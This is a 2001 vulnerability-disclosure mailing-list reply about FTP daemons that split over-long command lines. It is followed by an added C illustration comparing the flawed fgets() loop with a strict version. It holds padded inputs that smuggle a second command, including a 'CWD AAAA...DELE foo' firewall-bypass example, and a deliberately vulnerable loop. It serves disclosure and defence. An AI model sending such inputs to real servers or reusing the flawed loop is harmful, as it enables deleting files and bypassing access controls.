Re: serv-u 2.5e

From: BORBELY Zoltan (bozo@andrews.hu)
Date: 07/24/01


Date: Tue, 24 Jul 2001 09:48:12 +0200
From: BORBELY Zoltan <bozo@andrews.hu>
To: perkere stinker <doe_i_sorte_skodder@hotmail.com>
Subject: Re: serv-u 2.5e
Message-ID: <20010724094812.A786@dolphin.home>

On Mon, Jul 23, 2001 at 07:37:38PM +0000, perkere stinker wrote:
> log in, issue a PASV [buf] where buf is 507 bytes, after that you can issue
> a new command all in the same line. Can this be exploited anyway? Does it
> work on other versions? Is this pure crap? I don't know. Guess that's what
> vuln-dev is for?
>
> example:
>
> [foo@bar foo]$ telnet serv-u-server 21
> Trying 193.89.248.81...
> Connected to serv-u-server.
> Escape character is '^]'.
> 220 Serv-U FTP-Server v2.5e for WinSock ready...
> user perkere
> 331 User name okay, need password.
> pass stinker
> 230 User logged in, proceed.
> PASV
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWD
> upload
> 227 Entering Passive Mode (193,89,248,81,7,177)
> 250 Directory changed to /f:/Download/upload
>
> End example

Is the command really important? I think I discovered the same bug about
one year ago, but I had checked wu-ftpd. This "feature" can be really bad.
E.g. you are using an application-level firewall and you have configured your
gateway to disable the delete command. If the gateway doesn't check for proper
line termination (<CR><LF>) after the command, you can tunnel a disabled
command inside an allowed command:

CWD AAAAAAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAADELE foo

I had sent a mail to CERT but nothing happened. I had no time at that time, so
the story ended there. I've checked wu-ftpd and proftpd and both are affected.
I think most FTP daemons are affected.

It's very easy to implement this bad behaviour. The following pseudo C code
fragment shows a typical bad approach:

        #include <stdio.h>
        #include <string.h>

        char buff[512];   /* any fixed size */

        /* BAD: when a line is longer than the buffer, fgets() stops after
           sizeof(buff)-1 bytes; the rest of that line comes back from the
           next fgets() call and is handled as a separate command. */
        while ( fgets(buff,sizeof(buff),f) != NULL )
        {
            /* remove line termination if any */
            buff[strcspn(buff, "\r\n")] = '\0';

            handle_command(buff);
        }

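Added illustration (not from the mail, nor from Serv-U, wu-ftpd or proftpd): the loop above next to a checked version, run over a constructed session in which an over-long CWD line carries a second command after its padding. The 32-byte buffer, the session text, handle_command() and the dispatch log are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#define BUFSZ 32   /* deliberately small so the overrun stays short */
/* Constructed session (not from the mail): "CWD " plus 27 'A's is exactly
   BUFSZ-1 bytes, so fgets() stops right before the smuggled "DELE foo". */
static const char SESSION[] =
    "USER test\r\n"
    "CWD " "AAAAAAAAA" "AAAAAAAAA" "AAAAAAAAA" "DELE foo\r\n";

char dispatched[8][BUFSZ];   /* every string handle_command() received */
int n_dispatched, n_rejected;
static void handle_command(const char *cmd)   /* stand-in dispatcher */
{
    if (n_dispatched < 8) strcpy(dispatched[n_dispatched++], cmd);
}

static FILE *session_file(const char *text)   /* session text as a FILE* */
{
    FILE *f = tmpfile();
    if (f) { fputs(text, f); rewind(f); }
    n_dispatched = n_rejected = 0;
    return f;
}

/* strict == 0 is the loop from the mail: whatever fgets() hands back is
   dispatched, so the tail of an over-long line becomes a command of its own.
   strict == 1 dispatches only lines that fit and end in CRLF; anything else
   is drained to the end of the line and counted in n_rejected. */
int run_session(const char *session, int strict)
{
    char buff[BUFSZ];
    FILE *f = session_file(session);
    if (!f) return -1;
    while (fgets(buff, sizeof(buff), f) != NULL) {
        char *nl = strchr(buff, '\n');
        int terminated = nl != NULL && nl > buff && nl[-1] == '\r';
        if (strict && !terminated) {
            int c;
            if (nl == NULL)   /* line did not fit: skip its remainder */
                while ((c = fgetc(f)) != EOF && c != '\n') { }
            n_rejected++;
            continue;
        }
        buff[strcspn(buff, "\r\n")] = '\0';   /* remove line termination */
        handle_command(buff);
    }
    fclose(f);
    return n_dispatched;
}
```

With strict == 0 the third dispatched string is "DELE foo"; with strict == 1 the CWD line is rejected whole and only "USER test" reaches the dispatcher.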